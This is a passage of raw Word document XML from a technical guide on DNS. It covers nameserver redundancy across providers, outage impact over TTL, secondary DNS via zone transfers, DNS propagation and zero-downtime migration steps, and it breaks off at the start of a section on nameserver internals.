    <w:p w14:paraId="75B12C96" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Every zone must have at least 2 nameservers (most have 3–4):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29087400" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4456E111" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>example.com.    NS    ns1.example.com.    (primary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54052470" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>example.com.    NS    ns2.example.com.    (secondary, different network)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6453BFAA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>example.com.    NS    ns3.example.com.    (secondary, different provider)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BECDAEF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why different networks/providers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4897FE88" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="781"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>If all nameservers are in the same datacenter and that datacenter loses power → complete DNS outage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0C7D0E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="781"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Best practice: distribute across multiple providers (e.g., Route 53 + Cloudflare as secondary).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2626CE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="781"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Use different IP ranges, different physical locations, different upstream networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAB6075" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.2 The "DNS is down" Scenario — Impact Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA06E7B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>If your authoritative DNS is completely unreachable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BB0F78" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="782"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Clients with cached records: continue working until TTL expires.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4D3D91" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="782"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Clients without cached records: cannot resolve your domain → cannot reach your service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3FCEC0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="782"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>The ENTIRE service is effectively down for new clients, even though your actual servers are perfectly healthy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EB64E1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Timeline of impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0889F05F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED71DD1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>T=0:      DNS goes down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9FA256" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>T=0 to T=TTL: Existing users unaffected (cached records)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402374B0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>T=TTL:    Cache expires. New queries → SERVFAIL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B406DAA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>T=TTL+:   Increasing number of users can't reach you</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BBD18C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>T=2×TTL:  Essentially all users affected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D62C9F0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>With TTL=300 (5 min): full impact within 10 minutes. With TTL=86400 (24 hours): full impact takes 48 hours.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E9F379" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This is why:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172E4964" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="783"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Use multiple geographically distributed nameservers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C25266" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="783"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Use anycast DNS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE0016C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="783"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Use serve-stale at resolver level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA37B6E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="783"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Consider very long TTLs for stable records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C2F3B7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="783"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Use secondary DNS providers (cross-provider redundancy).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620C9BA1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.3 Secondary DNS Provider (Cross-Provider Redundancy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BB5BC3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BC0D5F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="784"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Primary DNS: Route 53 (manages zone, receives updates).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5759E4EE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="784"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Secondary DNS: Cloudflare (receives zone transfers from primary, serves queries independently).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB05C1F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="784"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>NS records list nameservers from BOTH providers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECAED0D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F4D2C2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="785"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>You manage records in Route 53 (source of truth).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10461773" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="785"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Cloudflare is configured as a secondary: receives AXFR/IXFR from Route 53.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFE4861" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="785"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>NS records include both Route 53's and Cloudflare's nameservers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152B9485" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="785"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>If Route 53 has an outage: Cloudflare continues serving queries independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ED7FB8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="785"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>If Cloudflare has an outage: Route 53 continues serving.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094981AD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Complete DNS provider outage becomes survivable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6400766E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:pict w14:anchorId="6BCC5714">
          <v:rect id="_x0000_i3488" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CC36BA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13. DNS Propagation — What Really Happens When You Change Records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355C2C1A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>13.1 The Propagation Myth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C14B392" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>"DNS propagation takes 24–48 hours" — this is misleading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3139AA04" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What actually happens:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3C1F9B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="786"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>You change a record at your authoritative nameserver. The change is INSTANT on the authoritative server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7995255B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="786"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Recursive resolvers worldwide have the OLD record cached (for up to the old TTL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C70469" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="786"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>As each resolver's cache expires, it re-queries your authoritative server and gets the new record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13012B68" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="786"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Maximum time = old record's TTL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEAE08A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>If TTL was 300 seconds:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> "Propagation" takes at most 5 minutes (for compliant resolvers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B4EAF9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why the "48 hours" myth persists:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA707F5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="787"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Historically, TTLs were set to 86400 (24 hours) by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E91000" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="787"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Some registrars/hosting providers set very high TTLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2017D394" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="787"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Non-compliant resolvers may cache longer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1C86BE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="787"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>NS record changes at the TLD level have their own TTL (typically 48 hours).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6A06C8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13.2 Strategies for Zero-Downtime DNS Changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309305BE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When migrating servers (changing IP):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135010C2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="788"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lower TTL in advance:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Days before the migration, reduce TTL from 3600 to 60. Wait for the old TTL to expire (so all caches have the new low TTL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019FA7F0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="788"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Make the change:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Update the A record to the new IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FA6446" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="788"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Keep old server running:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> For at least the old TTL duration after the change. Clients with stale caches still hit the old server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E5B336" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="788"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Old server redirects or proxies to new server:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Ensures no client gets errors during transition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B19057F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="788"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>After convergence:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Raise TTL back to desired value. Decommission old server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F49BBF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When migrating DNS providers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3807DA95" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="789"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Set up new provider, replicate all records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20596B0F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="789"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>Verify new provider serves correct responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216CEBA1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="789"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Lower TTL on NS records (at registrar level — may take up to 48 hours itself).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A983669" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="789"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Update NS records at registrar to point to new provider.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6C3973" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="789"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Keep old provider running for NS TTL duration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE4F2C8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="789"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>After convergence: decommission old provider.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00429BD5" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:pict w14:anchorId="19358D6F">
          <v:rect id="_x0000_i3489" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1660DE33" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14. DNS Internals — How Nameservers Process Queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D38F743" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.1 Authoritative Nameserver Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D72980B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Zone data storage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203FADB9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="790"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Zone file (traditional):</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
